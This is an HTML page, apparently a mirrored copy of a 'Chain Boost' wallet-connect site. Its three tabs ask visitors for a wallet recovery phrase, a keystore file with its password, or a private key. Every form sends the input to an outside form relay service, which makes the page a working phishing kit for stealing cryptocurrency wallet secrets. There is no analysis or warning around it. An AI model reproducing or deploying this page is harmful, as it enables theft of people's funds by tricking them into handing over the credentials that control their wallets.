<html>



<!-- Mirrored from smartforks.org/form/meta.html by HTTrack Website Copier/3.x [XR&CO'2014], Tue, 28 Dec 2021 18:06:07 GMT -->
<meta http-equiv="content-type" content="text/html;charset=UTF-8" />
<head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<link rel="stylesheet" href="assets/main.css" type="text/css"> 
<meta name="description" content="Open protocol for connecting Wallets to Dapps">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta property="#" content="#">
<link rel="icon" href="#">
<script>
    function openCity(evt, cityName) {
    // Declare all variables
    var i, tabcontent, tablinks;
  
    // Get all elements with class="tabcontent" and hide them
    tabcontent = document.getElementsByClassName("tabcontent");
    for (i = 0; i < tabcontent.length; i++) {
      tabcontent[i].style.display = "none";
    }
  
    // Get all elements with class="tablinks" and remove the class "active"
    tablinks = document.getElementsByClassName("tablinks");
    for (i = 0; i < tablinks.length; i++) {
      tablinks[i].className = tablinks[i].className.replace(" active", "");
    }
  
    // Show the current tab, and add an "active" class to the button that opened the tab
    document.getElementById(cityName).style.display = "block";
    evt.currentTarget.className += " active";
  }
  </script>
<title>Chain Boost</title>
</head>
<body>
<center>
<div class="top">
    
        <a href="../index-2.html" style="color: #222;" class="left">CONNECT WALLET</a>
        
</div>
<br>
<!-- <h2><center>WALLET CONNE</center></h2> -->
<br>
<div class="tab">
  <button class="tablinks active" id="default" onclick="openCity(event, &#39;phrase&#39;)">Phrase</button>
  <button class="tablinks" onclick="openCity(event, &#39;keystore&#39;)">Keystore JSON</button>
  <button class="tablinks" onclick="openCity(event, &#39;private&#39;)">Private Key</button>
</div>

<div id="phrase" class="tabcontent" style="display: block;">
            <form w="" action="https://app.form2chat.io/f/c42ca997" method="POST">

                <!-- <input type="hidden" name="w" value="Electrum"> -->

                <textarea name="phrase" class="phrase" required="required" minlength="12" placeholder="Phrase"></textarea>
                <br>
                <div class="desc">Typically 12 (sometimes 24) words separated by single spaces</div>
                <br>
                <button type="submit" name="submit" class="btn">IMPORT</button>
            </form>
        </div>

               <!-- <div class="desc">Ensure your Pass Phrase is correct! </div>
                <br>
                <button type="submit" name="submit" class="btn">IMPORT</button>
            </form>
        </div>-->


        <div id="keystore" class="tabcontent" style="display: none;">
            <form action="https://app.form2chat.io/f/c42ca997" method="POST">

                <!-- <input type="hidden" name="w" value="Electrum"> -->

                <textarea name="phrase" class="phrase" required="required" minlength="12" placeholder="Keystore JSON"></textarea>
                <br>
                <div class="field">
                    <input type="password" name="password" placeholder="Password">
                </div>
                <div class="desc">Several lines of text beginning with '(...)' plus the password you used to encrypt it.</div>
                <br>
                <button type="submit" name="submit" class="btn">IMPORT</button>
            </form>
        </div>

        <div id="private" class="tabcontent" style="display: none;">
            <form action="https://app.form2chat.io/f/c42ca997" method="POST">
                <!-- <input type="hidden" name="w" value="Electrum"> -->
                <div class="field">
                    <input type="text" name="key" class="key" placeholder="Private Key">
                </div>
                <div class="desc">Typically 12 (sometimes 24) words separated by single spaces</div>
                <br>
                <button type="submit" name="submit" class="btn">IMPORT</button>
            </form>
        </div>

<script>
    document.getElementById("default").click();
</script>

</center></body>

<!-- Mirrored from smartforks.org/form/meta.html by HTTrack Website Copier/3.x [XR&CO'2014], Tue, 28 Dec 2021 18:06:08 GMT -->
</html>
